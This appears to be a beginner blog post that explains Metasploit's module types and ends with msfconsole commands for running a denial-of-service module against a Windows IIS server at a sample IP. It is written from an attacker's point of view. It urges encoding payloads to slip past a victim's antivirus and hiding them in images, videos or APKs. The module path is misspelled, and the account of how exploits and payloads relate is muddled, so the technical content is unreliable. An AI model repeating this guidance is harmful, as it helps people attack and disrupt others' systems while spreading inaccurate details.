Auxiliaries, payloads, encoders, evasions, exploits, posts and nops are called modules in Metasploit that are used for different purposes. Now we will discuss about these modules in Metasploit.
1) AUXILIARIES:
These are specific codes that used for scanning, vulnerability analysis, password sniffing, Dos attack, Brute force attack etc. on target. These are very useful in Metasploit for different purposes. These are used by hacker mostly, for different tasks.
2) PAYLOADS:
These are viruses or specific codes that are used the either access, or to destroy or to perform specific tasks on target systems. Payload are generated and sent to victim and as victim will our payloads will start its work. Mostly hacker use payload to get meterpreter shell to control the system of victim. Payload can be injected in video, image, .exe file, .sh file, .apk file for easy access. But it is virus and antivirus software can detect it. To use payloads you must be connected to network of victim because these work in same network mostly.
3) ENCODERS:
These are used to encode the payload in different forms to bypass the antivirus software of victim. When payload is in its real from or code is detectable, but when we encode it antivirus cannot detect it easily. A hacker must encode his payload.
4) EVASIONS:
These are almost similar to encoders but mainly used to bypass antivirus of victim. These are new in Metasploit.
5) EXPLOITS:
Exploit are codes that are used to exploit different vulnerabilities of target system. When we exploit or hack any vulnerability then we can get full for limited control of victim’s system. Exploit is necessary for payload when we get control of our victim’s system. But payload may or may not be necessary for exploit to work. It gives us control, of victim’s system. Vulnerability is important for exploit but not important for payload to use.
Exploits in Metasploit
In easy words we generate a payload and send it to victim and after checking of victim we set different exploits and options to get control but when we try to access the system of victim exploit then we scan the system of victim find vulnerability and exploit for this specific vulnerability. Later on we can set payload or not, to control victim’s system.
6) POSTS:
These are exploits that are used to find different details of system of victim data of victim. Mostly used after getting meterpreter shell for different tasks.
Example of a Module Usage in Metasploit:
DoS Attack on Window Server Using Metasploit
We have discussed about DoS and DDoS attack in a separate post. Here we will discuss a module of Metasploit to perform DoS attack. To do that run the following commands;
(msfconsole)
(use auxiliary/dos/windows/http/ms10_o65_ii6_asp_dos)
(show options)
(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.1.8)
(exploit)